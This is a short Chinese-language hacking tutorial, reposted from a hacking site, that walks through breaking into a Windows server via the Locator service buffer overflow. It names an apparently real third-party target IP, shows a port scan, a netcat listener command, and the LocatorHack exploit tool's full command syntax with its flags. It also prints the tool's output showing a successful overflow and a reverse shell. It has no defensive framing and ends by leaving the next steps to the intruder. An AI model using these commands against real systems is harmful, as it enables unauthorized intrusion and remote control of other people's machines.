本文是记录一次利用LOCATOR漏洞的入侵主机的全部过程！
　　
　　
　　首先利用扫描工具检测服务器的3268端口，看是否有此项服务！
　　
　　
　　这里我们用SUPER SCAN这个工具 [原因：比较小而且方便]
　　
　　
　　大家可见了 这台机子存在服务 211.167.146.250
　　
　　
　　好了
　　
　　
　　开始实战演练
　　
　　
　　首先要利用我们强大的NC [NET CAT] 来监听一个端口
　　
　　
　　格式如下： nc -vv -l -p 94 [94 是随便的可根据你的习惯更改 但是不要占用WIN的默认使用端就行]
　　
　　
　　然后进行溢出 并让漏洞机自动连接我们
　　
　　
　　这里我们利用sunx的LOCATORHACK这个溢出工具
　　
　　
　　其具体格式如下：
　　
　　
　　LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99
　　
　　
　　溢出程序名 -H 漏洞IP -V 主机类型 -l 主机语言 -S 应该是SP的版本
　　
　　
　　-R 本机IP - P 溢出后的端口[自主选择当然是要用和你监听的同一个端口]
　　
　　
　　好了由此的出我们这次的格式
　　
　　
　　好开始了
　　
　　
　　溢出后会看到如下结果
　　
　　connect socket....
　　connect smb...
　　open namedpipe...
　　bind rpc...
　　call rpc...
　　Overflowed, 211.167.146.250:95
　　good luck
　　
　　
　　好了我们来看看刚才NC监听的CMD
　　
　　
　　呵呵
　　
　　我们已经进去了！
　　
　　
　　接下来想干什么就有你决定了
　　
　　
　　
　　

文章转载地址：http://www.cnpaf.net/Class/hack/0610111049203923988.html